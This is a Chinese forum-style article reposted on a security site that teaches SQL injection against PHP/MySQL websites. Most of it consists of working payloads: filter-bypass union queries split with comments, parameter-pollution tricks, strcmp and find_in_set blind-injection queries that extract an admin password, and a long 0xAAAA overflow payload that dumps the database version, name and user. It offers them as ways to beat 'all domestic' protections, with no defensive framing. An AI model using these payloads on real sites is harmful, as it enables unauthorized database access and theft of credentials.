首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全文章>文章資料>網絡安全>文章內容
淺談新型的sql注入測試
來源:http://hi.baidu.com/r00ts/blog/ 作者:落淚紅塵 發布時間:2012-02-24  
前段時間,幫別人看網站,習慣性的’,and 1=1 其實知道這種肯定被過濾,但還是測試了
php+mysql
 
首先說判斷:
 
Null值相信大家不陌生吧,可這么用: and 1 is null,and 1 is not null
 
或: and 2<=3
 
其實,很多人習慣性的用=號來判斷了,但是,如: >= ,<= ,is null,is not null,<>等 都可用于判斷
 
接著說注入
 
對于注射取值,我們熟悉的就是union select 和 blind sqlinjection(盲注)
 
先說Union Select
 
對于常規的注射,我們可以union select 1,2,3,4 或 union/**/select/**/ 1,2,3,4
 
Ok,看我演示, id=1+u/**/nio/**/n+se/**/lect+1&id=2,3&id=4 夠惡心吧?
 
可繞過國內所有防注射哦:) 這代碼運行后效果如上,至于原理我希望大家自己去
 
查查相關資料,有異議的可給我留言.
 
當然,在語句傳遞多個參數時 例如 slect * from table where id = 1 and name = xxx ,我們可這么做:
 
id=1+union/*&name=*/select+1,2
 
代入查詢后 slect * from table where id = 1 union /* and name = xxx */ select 1,2
 
這是一種讓常量(變量)失效的技巧,當然,環境要求比較苛刻
 
下面說說Blind SqlIjection(盲注)
 
一般方式,我想大家應該是這么做的: ascii(substring(password,1,1))=56,或者是
 
ord(mid(password,1,1))=56
 
在此,我推薦大家還是用子查詢,當然,前提是猜出表,字段,可更為準確的得到想得到的數據
 
此前,仍然向大家推薦一些新型的手法:
 
find_in_set 例: find_in_set(’56′,ascii(substr(password,1,1)))=1
 
strcmp 例: strcmp(left(‘password’,1), 0×56) = 1
 
將這些函數套如子查詢就是:
 
id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0×55)=1 false
 
id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0×56)=0 true
 
id =1+and+strcmp(substring((sleect+password+from+admin+limit+0,1),1,1),0×57)=-1 false
 
老外NB 方法 還有 -.-
 
悲劇還是繞不過去,nnd。要是國內
 
的站以上幾種方法一般都能搞定,老外就是bt。國外php 注射歷史悠久手法獨特+方法猥瑣 射出幾率相當高
 
http://www.xxx.com/index.php?content=more_product&id=-17 and (select 1)=(select
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA)+/*!union*/+select+1,2,3,4,5,6–+-
 
http://www.xxx.com/index.php?content=more_product&id=-17 and (select 1)=(select
0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),u
ser()),3,4,5,6–+-


 
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·一句話木馬
·samcrypt.lib簡介
·教你輕松查看QQ空間加密后的好友
·web sniffer 在線嗅探/online ht
·Cisco PIX525 配置備忘
·SPIKE與Peach Fuzzer相關知識
·用Iptables+Fedora做ADSL 路由器
·檢查 Web 應用安全的幾款開源免
·Md5(base64)加密與解密實戰
·asp,php,aspx一句話集合
·NT下動態切換進程分析筆記
·風險評估中的滲透測試
  相關文章
·淺談Ddos攻擊攻擊與防御
·常見 Webshell 的檢測方法及檢測
·asp,php,aspx一句話集合
·Auto pentesting. Nmap, SSLscan
·Content-Type 防范 XSS 繞過
·PHP中的密碼學算法及其應用2-對
·web sniffer 在線嗅探/online ht
·利用PHP編程防范XSS跨站腳本攻擊
·網絡游戲安全小議(端游/頁游/手
·Web開發框架安全雜談
·記錄一次網站被黑抓馬記
·從真實故事說起 讀黑客戰術社會
  推薦廣告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved
期本期特码